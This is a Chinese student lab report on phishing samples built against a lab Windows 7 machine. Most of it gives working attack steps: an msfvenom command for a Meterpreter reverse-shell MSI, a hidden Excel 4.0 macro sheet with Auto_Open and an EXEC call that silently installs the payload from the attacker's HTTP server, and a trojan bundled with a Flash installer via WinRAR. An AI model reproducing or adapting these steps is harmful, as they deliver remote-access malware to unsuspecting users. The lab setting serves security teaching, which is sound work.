一、实验目的
1、 通过模拟社会工程学攻击,深入理解其原理和方法;
2、了解并掌握社会工程学攻击的常见手段和技巧;
3、掌握钓鱼样本制作的方法。
二、实验任务
1、制作恶意的excel钓鱼样本;
2、制作正常软件和恶意木马进行捆绑打包钓鱼样本。
三、实验环境
1、靶机地址:192.168.5.131
2、攻击机地址:192.168.169.74
四、实验过程和实验结果
1.查看靶机地址,即win7地址:
2.查看靶机地址:
3.msf生成恶意的msi文件
使用命令msfvenom -p windows/meterpreter/reverse_tcp lhsot=192.168.169.74 lport=8989 -f msi -o diaoyua.msi,然后msf建立监听
4.然后python在具有恶意的msi的文件夹下开启http服务
5. 在win7新建一个Excel文档打开后右键底部Sheet1, 点击插入, 选择 MS Excel 4.0宏表,在A1格输入 =EXEC("msiexec /q /ihttp://192.168.169.74/diaoyua.msi") 然后回车,表示调用执行服务器上的dayu.msi文件;A2格输入=HALT() 标识Excel 4.0宏结束,第一格, 左上角的A1模式手动输入: Auto_Open ,Enter回车,右键底部宏1 , 选择隐藏
6.ctrl+s 保存, 弹出提示选择否 , 弹出的另存为选择 Excel 启用宏的工作簿 , 后缀为 .xlsm
7. 点击运行,回到监听页面,输入shell,得到成功上线
8.制作msf木马
9. 把木马和正常的flash 进行压缩, 放在一起用winrar添加到压缩文件,步骤如图所示
10. 启动msf进行监听
11. 然后把做好的恶意flash放到win7虚拟机中运行,回到kali终端输入shell,得到以下结果说明木马成功上线
五、实验总结
从原理上来说,社会工程学是通过分析攻击对象的心理弱点、利用人类的本能反应以及人的好奇、贪婪等心理特征进行的,使用诸如假冒、欺骗、引诱等多种手段来达成攻击目标的一种攻击手段。通过本次实验,我掌握了metaspolite的使用,巩固了msf监听的步骤,学会了生成木马的步骤,同时也注意到了端口的使用。